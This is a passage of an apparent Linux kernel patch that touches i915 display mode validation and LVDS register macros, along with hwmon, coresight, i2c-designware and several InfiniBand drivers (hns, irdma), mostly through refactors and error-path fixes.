+--- a/drivers/gpu/drm/i915/display/intel_dp.c
++++ b/drivers/gpu/drm/i915/display/intel_dp.c
+@@ -973,8 +973,9 @@ intel_dp_mode_valid(struct drm_connector *_connector,
+ 	enum drm_mode_status status;
+ 	bool dsc = false, bigjoiner = false;
+ 
+-	if (mode->flags & DRM_MODE_FLAG_DBLSCAN)
+-		return MODE_NO_DBLESCAN;
++	status = intel_cpu_transcoder_mode_valid(dev_priv, mode);
++	if (status != MODE_OK)
++		return status;
+ 
+ 	if (mode->flags & DRM_MODE_FLAG_DBLCLK)
+ 		return MODE_H_ILLEGAL;
+diff --git a/drivers/gpu/drm/i915/display/intel_dp_mst.c b/drivers/gpu/drm/i915/display/intel_dp_mst.c
+index 9a6822256ddf6..eec32f682012c 100644
+--- a/drivers/gpu/drm/i915/display/intel_dp_mst.c
++++ b/drivers/gpu/drm/i915/display/intel_dp_mst.c
+@@ -703,6 +703,10 @@ intel_dp_mst_mode_valid_ctx(struct drm_connector *connector,
+ 		return 0;
+ 	}
+ 
++	*status = intel_cpu_transcoder_mode_valid(dev_priv, mode);
++	if (*status != MODE_OK)
++		return 0;
++
+ 	if (mode->flags & DRM_MODE_FLAG_DBLSCAN) {
+ 		*status = MODE_NO_DBLESCAN;
+ 		return 0;
+diff --git a/drivers/gpu/drm/i915/display/intel_dvo.c b/drivers/gpu/drm/i915/display/intel_dvo.c
+index 5572e43026e4d..511c589070087 100644
+--- a/drivers/gpu/drm/i915/display/intel_dvo.c
++++ b/drivers/gpu/drm/i915/display/intel_dvo.c
+@@ -225,10 +225,16 @@ intel_dvo_mode_valid(struct drm_connector *connector,
+ {
+ 	struct intel_connector *intel_connector = to_intel_connector(connector);
+ 	struct intel_dvo *intel_dvo = intel_attached_dvo(intel_connector);
++	struct drm_i915_private *i915 = to_i915(intel_connector->base.dev);
+ 	const struct drm_display_mode *fixed_mode =
+ 		intel_panel_fixed_mode(intel_connector, mode);
+ 	int max_dotclk = to_i915(connector->dev)->max_dotclk_freq;
+ 	int target_clock = mode->clock;
++	enum drm_mode_status status;
++
++	status = intel_cpu_transcoder_mode_valid(i915, mode);
++	if (status != MODE_OK)
++		return status;
+ 
+ 	if (mode->flags & DRM_MODE_FLAG_DBLSCAN)
+ 		return MODE_NO_DBLESCAN;
+diff --git a/drivers/gpu/drm/i915/display/intel_hdmi.c b/drivers/gpu/drm/i915/display/intel_hdmi.c
+index 7816b2a33feeb..2600019fc8b96 100644
+--- a/drivers/gpu/drm/i915/display/intel_hdmi.c
++++ b/drivers/gpu/drm/i915/display/intel_hdmi.c
+@@ -1987,8 +1987,9 @@ intel_hdmi_mode_valid(struct drm_connector *connector,
+ 	bool has_hdmi_sink = intel_has_hdmi_sink(hdmi, connector->state);
+ 	bool ycbcr_420_only;
+ 
+-	if (mode->flags & DRM_MODE_FLAG_DBLSCAN)
+-		return MODE_NO_DBLESCAN;
++	status = intel_cpu_transcoder_mode_valid(dev_priv, mode);
++	if (status != MODE_OK)
++		return status;
+ 
+ 	if ((mode->flags & DRM_MODE_FLAG_3D_MASK) == DRM_MODE_FLAG_3D_FRAME_PACKING)
+ 		clock *= 2;
+diff --git a/drivers/gpu/drm/i915/display/intel_lvds.c b/drivers/gpu/drm/i915/display/intel_lvds.c
+index a749a5a66d624..40b5d3d3c7e14 100644
+--- a/drivers/gpu/drm/i915/display/intel_lvds.c
++++ b/drivers/gpu/drm/i915/display/intel_lvds.c
+@@ -92,9 +92,9 @@ bool intel_lvds_port_enabled(struct drm_i915_private *dev_priv,
+ 
+ 	/* asserts want to know the pipe even if the port is disabled */
+ 	if (HAS_PCH_CPT(dev_priv))
+-		*pipe = (val & LVDS_PIPE_SEL_MASK_CPT) >> LVDS_PIPE_SEL_SHIFT_CPT;
++		*pipe = REG_FIELD_GET(LVDS_PIPE_SEL_MASK_CPT, val);
+ 	else
+-		*pipe = (val & LVDS_PIPE_SEL_MASK) >> LVDS_PIPE_SEL_SHIFT;
++		*pipe = REG_FIELD_GET(LVDS_PIPE_SEL_MASK, val);
+ 
+ 	return val & LVDS_PORT_EN;
+ }
+@@ -389,11 +389,16 @@ intel_lvds_mode_valid(struct drm_connector *connector,
+ 		      struct drm_display_mode *mode)
+ {
+ 	struct intel_connector *intel_connector = to_intel_connector(connector);
++	struct drm_i915_private *i915 = to_i915(intel_connector->base.dev);
+ 	const struct drm_display_mode *fixed_mode =
+ 		intel_panel_fixed_mode(intel_connector, mode);
+ 	int max_pixclk = to_i915(connector->dev)->max_dotclk_freq;
+ 	enum drm_mode_status status;
+ 
++	status = intel_cpu_transcoder_mode_valid(i915, mode);
++	if (status != MODE_OK)
++		return status;
++
+ 	if (mode->flags & DRM_MODE_FLAG_DBLSCAN)
+ 		return MODE_NO_DBLESCAN;
+ 
+diff --git a/drivers/gpu/drm/i915/display/intel_sdvo.c b/drivers/gpu/drm/i915/display/intel_sdvo.c
+index 2c2e0f041f869..8294dddfd9de8 100644
+--- a/drivers/gpu/drm/i915/display/intel_sdvo.c
++++ b/drivers/gpu/drm/i915/display/intel_sdvo.c
+@@ -115,7 +115,6 @@ struct intel_sdvo {
+ 
+ 	enum port port;
+ 
+-	bool has_hdmi_monitor;
+ 	bool has_hdmi_audio;
+ 
+ 	/* DDC bus used by this SDVO encoder */
+@@ -1278,10 +1277,13 @@ static void i9xx_adjust_sdvo_tv_clock(struct intel_crtc_state *pipe_config)
+ 	pipe_config->clock_set = true;
+ }
+ 
+-static bool intel_has_hdmi_sink(struct intel_sdvo *sdvo,
++static bool intel_has_hdmi_sink(struct intel_sdvo_connector *intel_sdvo_connector,
+ 				const struct drm_connector_state *conn_state)
+ {
+-	return sdvo->has_hdmi_monitor &&
++	struct drm_connector *connector = conn_state->connector;
++
++	return intel_sdvo_connector->is_hdmi &&
++		connector->display_info.is_hdmi &&
+ 		READ_ONCE(to_intel_digital_connector_state(conn_state)->force_audio) != HDMI_AUDIO_OFF_DVI;
+ }
+ 
+@@ -1360,7 +1362,7 @@ static int intel_sdvo_compute_config(struct intel_encoder *encoder,
+ 	pipe_config->pixel_multiplier =
+ 		intel_sdvo_get_pixel_multiplier(adjusted_mode);
+ 
+-	pipe_config->has_hdmi_sink = intel_has_hdmi_sink(intel_sdvo, conn_state);
++	pipe_config->has_hdmi_sink = intel_has_hdmi_sink(intel_sdvo_connector, conn_state);
+ 
+ 	if (pipe_config->has_hdmi_sink) {
+ 		if (intel_sdvo_state->base.force_audio == HDMI_AUDIO_AUTO)
+@@ -1871,13 +1873,19 @@ static enum drm_mode_status
+ intel_sdvo_mode_valid(struct drm_connector *connector,
+ 		      struct drm_display_mode *mode)
+ {
++	struct drm_i915_private *i915 = to_i915(connector->dev);
+ 	struct intel_sdvo *intel_sdvo = intel_attached_sdvo(to_intel_connector(connector));
+ 	struct intel_sdvo_connector *intel_sdvo_connector =
+ 		to_intel_sdvo_connector(connector);
+-	int max_dotclk = to_i915(connector->dev)->max_dotclk_freq;
+-	bool has_hdmi_sink = intel_has_hdmi_sink(intel_sdvo, connector->state);
++	bool has_hdmi_sink = intel_has_hdmi_sink(intel_sdvo_connector, connector->state);
++	int max_dotclk = i915->max_dotclk_freq;
++	enum drm_mode_status status;
+ 	int clock = mode->clock;
+ 
++	status = intel_cpu_transcoder_mode_valid(i915, mode);
++	if (status != MODE_OK)
++		return status;
++
+ 	if (mode->flags & DRM_MODE_FLAG_DBLSCAN)
+ 		return MODE_NO_DBLESCAN;
+ 
+@@ -2064,7 +2072,6 @@ intel_sdvo_tmds_sink_detect(struct drm_connector *connector)
+ 		if (edid->input & DRM_EDID_INPUT_DIGITAL) {
+ 			status = connector_status_connected;
+ 			if (intel_sdvo_connector->is_hdmi) {
+-				intel_sdvo->has_hdmi_monitor = drm_detect_hdmi_monitor(edid);
+ 				intel_sdvo->has_hdmi_audio = drm_detect_monitor_audio(edid);
+ 			}
+ 		} else
+@@ -2116,7 +2123,6 @@ intel_sdvo_detect(struct drm_connector *connector, bool force)
+ 
+ 	intel_sdvo->attached_output = response;
+ 
+-	intel_sdvo->has_hdmi_monitor = false;
+ 	intel_sdvo->has_hdmi_audio = false;
+ 
+ 	if ((intel_sdvo_connector->output_flag & response) == 0)
+diff --git a/drivers/gpu/drm/i915/display/intel_tv.c b/drivers/gpu/drm/i915/display/intel_tv.c
+index dcf89d701f0f6..fb25be800e753 100644
+--- a/drivers/gpu/drm/i915/display/intel_tv.c
++++ b/drivers/gpu/drm/i915/display/intel_tv.c
+@@ -956,8 +956,14 @@ static enum drm_mode_status
+ intel_tv_mode_valid(struct drm_connector *connector,
+ 		    struct drm_display_mode *mode)
+ {
++	struct drm_i915_private *i915 = to_i915(connector->dev);
+ 	const struct tv_mode *tv_mode = intel_tv_mode_find(connector->state);
+-	int max_dotclk = to_i915(connector->dev)->max_dotclk_freq;
++	int max_dotclk = i915->max_dotclk_freq;
++	enum drm_mode_status status;
++
++	status = intel_cpu_transcoder_mode_valid(i915, mode);
++	if (status != MODE_OK)
++		return status;
+ 
+ 	if (mode->flags & DRM_MODE_FLAG_DBLSCAN)
+ 		return MODE_NO_DBLESCAN;
+diff --git a/drivers/gpu/drm/i915/display/vlv_dsi.c b/drivers/gpu/drm/i915/display/vlv_dsi.c
+index 00c80f29ad999..114088ca59ed4 100644
+--- a/drivers/gpu/drm/i915/display/vlv_dsi.c
++++ b/drivers/gpu/drm/i915/display/vlv_dsi.c
+@@ -1627,9 +1627,25 @@ static const struct drm_encoder_funcs intel_dsi_funcs = {
+ 	.destroy = intel_dsi_encoder_destroy,
+ };
+ 
++static enum drm_mode_status vlv_dsi_mode_valid(struct drm_connector *connector,
++					       struct drm_display_mode *mode)
++{
++	struct drm_i915_private *i915 = to_i915(connector->dev);
++
++	if (IS_VALLEYVIEW(i915) || IS_CHERRYVIEW(i915)) {
++		enum drm_mode_status status;
++
++		status = intel_cpu_transcoder_mode_valid(i915, mode);
++		if (status != MODE_OK)
++			return status;
++	}
++
++	return intel_dsi_mode_valid(connector, mode);
++}
++
+ static const struct drm_connector_helper_funcs intel_dsi_connector_helper_funcs = {
+ 	.get_modes = intel_dsi_get_modes,
+-	.mode_valid = intel_dsi_mode_valid,
++	.mode_valid = vlv_dsi_mode_valid,
+ 	.atomic_check = intel_digital_connector_atomic_check,
+ };
+ 
+diff --git a/drivers/gpu/drm/i915/i915_reg.h b/drivers/gpu/drm/i915/i915_reg.h
+index 25015996f627a..c6766704340eb 100644
+--- a/drivers/gpu/drm/i915/i915_reg.h
++++ b/drivers/gpu/drm/i915/i915_reg.h
+@@ -2681,52 +2681,50 @@
+  * Enables the LVDS port.  This bit must be set before DPLLs are enabled, as
+  * the DPLL semantics change when the LVDS is assigned to that pipe.
+  */
+-#define   LVDS_PORT_EN			(1 << 31)
++#define   LVDS_PORT_EN			REG_BIT(31)
+ /* Selects pipe B for LVDS data.  Must be set on pre-965. */
+-#define   LVDS_PIPE_SEL_SHIFT		30
+-#define   LVDS_PIPE_SEL_MASK		(1 << 30)
+-#define   LVDS_PIPE_SEL(pipe)		((pipe) << 30)
+-#define   LVDS_PIPE_SEL_SHIFT_CPT	29
+-#define   LVDS_PIPE_SEL_MASK_CPT	(3 << 29)
+-#define   LVDS_PIPE_SEL_CPT(pipe)	((pipe) << 29)
++#define   LVDS_PIPE_SEL_MASK		REG_BIT(30)
++#define   LVDS_PIPE_SEL(pipe)		REG_FIELD_PREP(LVDS_PIPE_SEL_MASK, (pipe))
++#define   LVDS_PIPE_SEL_MASK_CPT	REG_GENMASK(30, 29)
++#define   LVDS_PIPE_SEL_CPT(pipe)	REG_FIELD_PREP(LVDS_PIPE_SEL_MASK_CPT, (pipe))
+ /* LVDS dithering flag on 965/g4x platform */
+-#define   LVDS_ENABLE_DITHER		(1 << 25)
++#define   LVDS_ENABLE_DITHER		REG_BIT(25)
+ /* LVDS sync polarity flags. Set to invert (i.e. negative) */
+-#define   LVDS_VSYNC_POLARITY		(1 << 21)
+-#define   LVDS_HSYNC_POLARITY		(1 << 20)
++#define   LVDS_VSYNC_POLARITY		REG_BIT(21)
++#define   LVDS_HSYNC_POLARITY		REG_BIT(20)
+ 
+ /* Enable border for unscaled (or aspect-scaled) display */
+-#define   LVDS_BORDER_ENABLE		(1 << 15)
++#define   LVDS_BORDER_ENABLE		REG_BIT(15)
+ /*
+  * Enables the A0-A2 data pairs and CLKA, containing 18 bits of color data per
+  * pixel.
+  */
+-#define   LVDS_A0A2_CLKA_POWER_MASK	(3 << 8)
+-#define   LVDS_A0A2_CLKA_POWER_DOWN	(0 << 8)
+-#define   LVDS_A0A2_CLKA_POWER_UP	(3 << 8)
++#define   LVDS_A0A2_CLKA_POWER_MASK	REG_GENMASK(9, 8)
++#define   LVDS_A0A2_CLKA_POWER_DOWN	REG_FIELD_PREP(LVDS_A0A2_CLKA_POWER_MASK, 0)
++#define   LVDS_A0A2_CLKA_POWER_UP	REG_FIELD_PREP(LVDS_A0A2_CLKA_POWER_MASK, 3)
+ /*
+  * Controls the A3 data pair, which contains the additional LSBs for 24 bit
+  * mode.  Only enabled if LVDS_A0A2_CLKA_POWER_UP also indicates it should be
+  * on.
+  */
+-#define   LVDS_A3_POWER_MASK		(3 << 6)
+-#define   LVDS_A3_POWER_DOWN		(0 << 6)
+-#define   LVDS_A3_POWER_UP		(3 << 6)
++#define   LVDS_A3_POWER_MASK		REG_GENMASK(7, 6)
++#define   LVDS_A3_POWER_DOWN		REG_FIELD_PREP(LVDS_A3_POWER_MASK, 0)
++#define   LVDS_A3_POWER_UP		REG_FIELD_PREP(LVDS_A3_POWER_MASK, 3)
+ /*
+  * Controls the CLKB pair.  This should only be set when LVDS_B0B3_POWER_UP
+  * is set.
+  */
+-#define   LVDS_CLKB_POWER_MASK		(3 << 4)
+-#define   LVDS_CLKB_POWER_DOWN		(0 << 4)
+-#define   LVDS_CLKB_POWER_UP		(3 << 4)
++#define   LVDS_CLKB_POWER_MASK		REG_GENMASK(5, 4)
++#define   LVDS_CLKB_POWER_DOWN		REG_FIELD_PREP(LVDS_CLKB_POWER_MASK, 0)
++#define   LVDS_CLKB_POWER_UP		REG_FIELD_PREP(LVDS_CLKB_POWER_MASK, 3)
+ /*
+  * Controls the B0-B3 data pairs.  This must be set to match the DPLL p2
+  * setting for whether we are in dual-channel mode.  The B3 pair will
+  * additionally only be powered up when LVDS_A3_POWER_UP is set.
+  */
+-#define   LVDS_B0B3_POWER_MASK		(3 << 2)
+-#define   LVDS_B0B3_POWER_DOWN		(0 << 2)
+-#define   LVDS_B0B3_POWER_UP		(3 << 2)
++#define   LVDS_B0B3_POWER_MASK		REG_GENMASK(3, 2)
++#define   LVDS_B0B3_POWER_DOWN		REG_FIELD_PREP(LVDS_B0B3_POWER_MASK, 0)
++#define   LVDS_B0B3_POWER_UP		REG_FIELD_PREP(LVDS_B0B3_POWER_MASK, 3)
+ 
+ /* Video Data Island Packet control */
+ #define VIDEO_DIP_DATA		_MMIO(0x61178)
+@@ -6461,7 +6459,7 @@
+ #define FDI_PLL_CTL_2           _MMIO(0xfe004)
+ 
+ #define PCH_LVDS	_MMIO(0xe1180)
+-#define  LVDS_DETECTED	(1 << 1)
++#define   LVDS_DETECTED	REG_BIT(1)
+ 
+ #define _PCH_DP_B		0xe4100
+ #define PCH_DP_B		_MMIO(_PCH_DP_B)
+diff --git a/drivers/hwmon/acpi_power_meter.c b/drivers/hwmon/acpi_power_meter.c
+index 0962c12eba5a0..2147afb725581 100644
+--- a/drivers/hwmon/acpi_power_meter.c
++++ b/drivers/hwmon/acpi_power_meter.c
+@@ -31,6 +31,7 @@
+ #define POWER_METER_CAN_NOTIFY	(1 << 3)
+ #define POWER_METER_IS_BATTERY	(1 << 8)
+ #define UNKNOWN_HYSTERESIS	0xFFFFFFFF
++#define UNKNOWN_POWER		0xFFFFFFFF
+ 
+ #define METER_NOTIFY_CONFIG	0x80
+ #define METER_NOTIFY_TRIP	0x81
+@@ -348,6 +349,9 @@ static ssize_t show_power(struct device *dev,
+ 	update_meter(resource);
+ 	mutex_unlock(&resource->lock);
+ 
++	if (resource->power == UNKNOWN_POWER)
++		return -ENODATA;
++
+ 	return sprintf(buf, "%llu\n", resource->power * 1000);
+ }
+ 
+diff --git a/drivers/hwmon/nzxt-kraken2.c b/drivers/hwmon/nzxt-kraken2.c
+index 89f7ea4f42d47..badbcaf01f90b 100644
+--- a/drivers/hwmon/nzxt-kraken2.c
++++ b/drivers/hwmon/nzxt-kraken2.c
+@@ -161,13 +161,13 @@ static int kraken2_probe(struct hid_device *hdev,
+ 	ret = hid_hw_start(hdev, HID_CONNECT_HIDRAW);
+ 	if (ret) {
+ 		hid_err(hdev, "hid hw start failed with %d\n", ret);
+-		goto fail_and_stop;
++		return ret;
+ 	}
+ 
+ 	ret = hid_hw_open(hdev);
+ 	if (ret) {
+ 		hid_err(hdev, "hid hw open failed with %d\n", ret);
+-		goto fail_and_close;
++		goto fail_and_stop;
+ 	}
+ 
+ 	priv->hwmon_dev = hwmon_device_register_with_info(&hdev->dev, "kraken2",
+diff --git a/drivers/hwtracing/coresight/coresight-etm4x-core.c b/drivers/hwtracing/coresight/coresight-etm4x-core.c
+index 1cf7478da6ee8..fda48a0afc1a5 100644
+--- a/drivers/hwtracing/coresight/coresight-etm4x-core.c
++++ b/drivers/hwtracing/coresight/coresight-etm4x-core.c
+@@ -2072,7 +2072,7 @@ static void clear_etmdrvdata(void *info)
+ 	etmdrvdata[cpu] = NULL;
+ }
+ 
+-static int __exit etm4_remove_dev(struct etmv4_drvdata *drvdata)
++static void etm4_remove_dev(struct etmv4_drvdata *drvdata)
+ {
+ 	etm_perf_symlink(drvdata->csdev, false);
+ 	/*
+@@ -2094,10 +2094,9 @@ static int __exit etm4_remove_dev(struct etmv4_drvdata *drvdata)
+ 	cscfg_unregister_csdev(drvdata->csdev);
+ 	coresight_unregister(drvdata->csdev);
+ 
+-	return 0;
+ }
+ 
+-static void __exit etm4_remove_amba(struct amba_device *adev)
++static void etm4_remove_amba(struct amba_device *adev)
+ {
+ 	struct etmv4_drvdata *drvdata = dev_get_drvdata(&adev->dev);
+ 
+@@ -2105,15 +2104,14 @@ static void __exit etm4_remove_amba(struct amba_device *adev)
+ 		etm4_remove_dev(drvdata);
+ }
+ 
+-static int __exit etm4_remove_platform_dev(struct platform_device *pdev)
++static int etm4_remove_platform_dev(struct platform_device *pdev)
+ {
+-	int ret = 0;
+ 	struct etmv4_drvdata *drvdata = dev_get_drvdata(&pdev->dev);
+ 
+ 	if (drvdata)
+-		ret = etm4_remove_dev(drvdata);
++		etm4_remove_dev(drvdata);
+ 	pm_runtime_disable(&pdev->dev);
+-	return ret;
++	return 0;
+ }
+ 
+ static const struct amba_id etm4_ids[] = {
+diff --git a/drivers/hwtracing/ptt/hisi_ptt.c b/drivers/hwtracing/ptt/hisi_ptt.c
+index 4140efd664097..016220ba0addd 100644
+--- a/drivers/hwtracing/ptt/hisi_ptt.c
++++ b/drivers/hwtracing/ptt/hisi_ptt.c
+@@ -837,6 +837,10 @@ static void hisi_ptt_pmu_del(struct perf_event *event, int flags)
+ 	hisi_ptt_pmu_stop(event, PERF_EF_UPDATE);
+ }
+ 
++static void hisi_ptt_pmu_read(struct perf_event *event)
++{
++}
++
+ static void hisi_ptt_remove_cpuhp_instance(void *hotplug_node)
+ {
+ 	cpuhp_state_remove_instance_nocalls(hisi_ptt_pmu_online, hotplug_node);
+@@ -880,6 +884,7 @@ static int hisi_ptt_register_pmu(struct hisi_ptt *hisi_ptt)
+ 		.stop		= hisi_ptt_pmu_stop,
+ 		.add		= hisi_ptt_pmu_add,
+ 		.del		= hisi_ptt_pmu_del,
++		.read		= hisi_ptt_pmu_read,
+ 	};
+ 
+ 	reg = readl(hisi_ptt->iobase + HISI_PTT_LOCATION);
+diff --git a/drivers/i2c/busses/i2c-designware-common.c b/drivers/i2c/busses/i2c-designware-common.c
+index 6fdb25a5f8016..ad98c85ec2e7a 100644
+--- a/drivers/i2c/busses/i2c-designware-common.c
++++ b/drivers/i2c/busses/i2c-designware-common.c
+@@ -63,7 +63,7 @@ static int dw_reg_read(void *context, unsigned int reg, unsigned int *val)
+ {
+ 	struct dw_i2c_dev *dev = context;
+ 
+-	*val = readl_relaxed(dev->base + reg);
++	*val = readl(dev->base + reg);
+ 
+ 	return 0;
+ }
+@@ -72,7 +72,7 @@ static int dw_reg_write(void *context, unsigned int reg, unsigned int val)
+ {
+ 	struct dw_i2c_dev *dev = context;
+ 
+-	writel_relaxed(val, dev->base + reg);
++	writel(val, dev->base + reg);
+ 
+ 	return 0;
+ }
+@@ -81,7 +81,7 @@ static int dw_reg_read_swab(void *context, unsigned int reg, unsigned int *val)
+ {
+ 	struct dw_i2c_dev *dev = context;
+ 
+-	*val = swab32(readl_relaxed(dev->base + reg));
++	*val = swab32(readl(dev->base + reg));
+ 
+ 	return 0;
+ }
+@@ -90,7 +90,7 @@ static int dw_reg_write_swab(void *context, unsigned int reg, unsigned int val)
+ {
+ 	struct dw_i2c_dev *dev = context;
+ 
+-	writel_relaxed(swab32(val), dev->base + reg);
++	writel(swab32(val), dev->base + reg);
+ 
+ 	return 0;
+ }
+@@ -99,8 +99,8 @@ static int dw_reg_read_word(void *context, unsigned int reg, unsigned int *val)
+ {
+ 	struct dw_i2c_dev *dev = context;
+ 
+-	*val = readw_relaxed(dev->base + reg) |
+-		(readw_relaxed(dev->base + reg + 2) << 16);
++	*val = readw(dev->base + reg) |
++		(readw(dev->base + reg + 2) << 16);
+ 
+ 	return 0;
+ }
+@@ -109,8 +109,8 @@ static int dw_reg_write_word(void *context, unsigned int reg, unsigned int val)
+ {
+ 	struct dw_i2c_dev *dev = context;
+ 
+-	writew_relaxed(val, dev->base + reg);
+-	writew_relaxed(val >> 16, dev->base + reg + 2);
++	writew(val, dev->base + reg);
++	writew(val >> 16, dev->base + reg + 2);
+ 
+ 	return 0;
+ }
+diff --git a/drivers/infiniband/core/umem.c b/drivers/infiniband/core/umem.c
+index 957634eceba8f..8ce569bf7525e 100644
+--- a/drivers/infiniband/core/umem.c
++++ b/drivers/infiniband/core/umem.c
+@@ -96,12 +96,6 @@ unsigned long ib_umem_find_best_pgsz(struct ib_umem *umem,
+ 		return page_size;
+ 	}
+ 
+-	/* rdma_for_each_block() has a bug if the page size is smaller than the
+-	 * page size used to build the umem. For now prevent smaller page sizes
+-	 * from being returned.
+-	 */
+-	pgsz_bitmap &= GENMASK(BITS_PER_LONG - 1, PAGE_SHIFT);
+-
+ 	/* The best result is the smallest page size that results in the minimum
+ 	 * number of required pages. Compute the largest page size that could
+ 	 * work based on VA address bits that don't change.
+diff --git a/drivers/infiniband/hw/bnxt_re/main.c b/drivers/infiniband/hw/bnxt_re/main.c
+index e58893387bb4d..43d396a7d8e16 100644
+--- a/drivers/infiniband/hw/bnxt_re/main.c
++++ b/drivers/infiniband/hw/bnxt_re/main.c
+@@ -70,7 +70,7 @@ static char version[] =
+ 		BNXT_RE_DESC "\n";
+ 
+ MODULE_AUTHOR("Eddie Wai <eddie.wai@broadcom.com>");
+-MODULE_DESCRIPTION(BNXT_RE_DESC " Driver");
++MODULE_DESCRIPTION(BNXT_RE_DESC);
+ MODULE_LICENSE("Dual BSD/GPL");
+ 
+ /* globals */
+diff --git a/drivers/infiniband/hw/hns/hns_roce_hw_v2.c b/drivers/infiniband/hw/hns/hns_roce_hw_v2.c
+index 8a9d28f81149a..c2ee80546d120 100644
+--- a/drivers/infiniband/hw/hns/hns_roce_hw_v2.c
++++ b/drivers/infiniband/hw/hns/hns_roce_hw_v2.c
+@@ -4913,10 +4913,15 @@ static int check_cong_type(struct ib_qp *ibqp,
+ 		cong_alg->wnd_mode_sel = WND_LIMIT;
+ 		break;
+ 	default:
+-		ibdev_err(&hr_dev->ib_dev,
+-			  "error type(%u) for congestion selection.\n",
+-			  hr_dev->caps.cong_type);
+-		return -EINVAL;
++		ibdev_warn(&hr_dev->ib_dev,
++			   "invalid type(%u) for congestion selection.\n",
++			   hr_dev->caps.cong_type);
++		hr_dev->caps.cong_type = CONG_TYPE_DCQCN;
++		cong_alg->alg_sel = CONG_DCQCN;
++		cong_alg->alg_sub_sel = UNSUPPORT_CONG_LEVEL;
++		cong_alg->dip_vld = DIP_INVALID;
++		cong_alg->wnd_mode_sel = WND_LIMIT;
++		break;
+ 	}
+ 
+ 	return 0;
+diff --git a/drivers/infiniband/hw/irdma/hw.c b/drivers/infiniband/hw/irdma/hw.c
+index c07ce85d243f1..311a1138e838d 100644
+--- a/drivers/infiniband/hw/irdma/hw.c
++++ b/drivers/infiniband/hw/irdma/hw.c
+@@ -322,7 +322,11 @@ static void irdma_process_aeq(struct irdma_pci_f *rf)
+ 			break;
+ 		case IRDMA_AE_QP_SUSPEND_COMPLETE:
+ 			if (iwqp->iwdev->vsi.tc_change_pending) {
+-				atomic_dec(&iwqp->sc_qp.vsi->qp_suspend_reqs);
++				if (!atomic_dec_return(&qp->vsi->qp_suspend_reqs))
++					wake_up(&iwqp->iwdev->suspend_wq);
++			}
++			if (iwqp->suspend_pending) {
++				iwqp->suspend_pending = false;
+ 				wake_up(&iwqp->iwdev->suspend_wq);
+ 			}
+ 			break;
+@@ -568,16 +572,13 @@ static void irdma_destroy_irq(struct irdma_pci_f *rf,
+  * Issue destroy cqp request and
+  * free the resources associated with the cqp
+  */
+-static void irdma_destroy_cqp(struct irdma_pci_f *rf, bool free_hwcqp)
++static void irdma_destroy_cqp(struct irdma_pci_f *rf)
+ {
+ 	struct irdma_sc_dev *dev = &rf->sc_dev;
+ 	struct irdma_cqp *cqp = &rf->cqp;
+ 	int status = 0;
+ 
+-	if (rf->cqp_cmpl_wq)
+-		destroy_workqueue(rf->cqp_cmpl_wq);
+-	if (free_hwcqp)
+-		status = irdma_sc_cqp_destroy(dev->cqp);
++	status = irdma_sc_cqp_destroy(dev->cqp);
+ 	if (status)
+ 		ibdev_dbg(to_ibdev(dev), "ERR: Destroy CQP failed %d\n", status);
+ 
+@@ -741,6 +742,9 @@ static void irdma_destroy_ccq(struct irdma_pci_f *rf)
+ 	struct irdma_ccq *ccq = &rf->ccq;
+ 	int status = 0;
+ 
++	if (rf->cqp_cmpl_wq)
++		destroy_workqueue(rf->cqp_cmpl_wq);
++
+ 	if (!rf->reset)
+ 		status = irdma_sc_ccq_destroy(dev->ccq, 0, true);
+ 	if (status)
+@@ -921,8 +925,8 @@ static int irdma_create_cqp(struct irdma_pci_f *rf)
+ 
+ 	cqp->scratch_array = kcalloc(sqsize, sizeof(*cqp->scratch_array), GFP_KERNEL);
+ 	if (!cqp->scratch_array) {
+-		kfree(cqp->cqp_requests);
+-		return -ENOMEM;
++		status = -ENOMEM;
++		goto err_scratch;
+ 	}
+ 
+ 	dev->cqp = &cqp->sc_cqp;
+@@ -932,15 +936,14 @@ static int irdma_create_cqp(struct irdma_pci_f *rf)
+ 	cqp->sq.va = dma_alloc_coherent(dev->hw->device, cqp->sq.size,
+ 					&cqp->sq.pa, GFP_KERNEL);
+ 	if (!cqp->sq.va) {
+-		kfree(cqp->scratch_array);
+-		kfree(cqp->cqp_requests);
+-		return -ENOMEM;
++		status = -ENOMEM;
++		goto err_sq;
+ 	}
+ 
+ 	status = irdma_obj_aligned_mem(rf, &mem, sizeof(struct irdma_cqp_ctx),
+ 				       IRDMA_HOST_CTX_ALIGNMENT_M);
+ 	if (status)
+-		goto exit;
++		goto err_ctx;
+ 
+ 	dev->cqp->host_ctx_pa = mem.pa;
+ 	dev->cqp->host_ctx = mem.va;
+@@ -966,7 +969,7 @@ static int irdma_create_cqp(struct irdma_pci_f *rf)
+ 	status = irdma_sc_cqp_init(dev->cqp, &cqp_init_info);
+ 	if (status) {
+ 		ibdev_dbg(to_ibdev(dev), "ERR: cqp init status %d\n", status);
+-		goto exit;
++		goto err_ctx;
+ 	}
+ 
+ 	spin_lock_init(&cqp->req_lock);
+@@ -977,7 +980,7 @@ static int irdma_create_cqp(struct irdma_pci_f *rf)
+ 		ibdev_dbg(to_ibdev(dev),
+ 			  "ERR: cqp create failed - status %d maj_err %d min_err %d\n",
+ 			  status, maj_err, min_err);
+-		goto exit;
++		goto err_ctx;
+ 	}
+ 
+ 	INIT_LIST_HEAD(&cqp->cqp_avail_reqs);
+@@ -991,8 +994,16 @@ static int irdma_create_cqp(struct irdma_pci_f *rf)
+ 	init_waitqueue_head(&cqp->remove_wq);
+ 	return 0;
+ 
+-exit:
+-	irdma_destroy_cqp(rf, false);
++err_ctx:
++	dma_free_coherent(dev->hw->device, cqp->sq.size,
++			  cqp->sq.va, cqp->sq.pa);
++	cqp->sq.va = NULL;
++err_sq:
++	kfree(cqp->scratch_array);
++	cqp->scratch_array = NULL;
++err_scratch:
++	kfree(cqp->cqp_requests);
++	cqp->cqp_requests = NULL;
+ 
+ 	return status;
+ }
+@@ -1159,7 +1170,6 @@ static int irdma_create_ceq(struct irdma_pci_f *rf, struct irdma_ceq *iwceq,
+ 	int status;
+ 	struct irdma_ceq_init_info info = {};
+ 	struct irdma_sc_dev *dev = &rf->sc_dev;
+-	u64 scratch;
+ 	u32 ceq_size;
+ 
+ 	info.ceq_id = ceq_id;
+@@ -1180,14 +1190,13 @@ static int irdma_create_ceq(struct irdma_pci_f *rf, struct irdma_ceq *iwceq,
+ 	iwceq->sc_ceq.ceq_id = ceq_id;
+ 	info.dev = dev;
+ 	info.vsi = vsi;
+-	scratch = (uintptr_t)&rf->cqp.sc_cqp;
+ 	status = irdma_sc_ceq_init(&iwceq->sc_ceq, &info);
+ 	if (!status) {
+ 		if (dev->ceq_valid)
+ 			status = irdma_cqp_ceq_cmd(&rf->sc_dev, &iwceq->sc_ceq,
+ 						   IRDMA_OP_CEQ_CREATE);
+ 		else
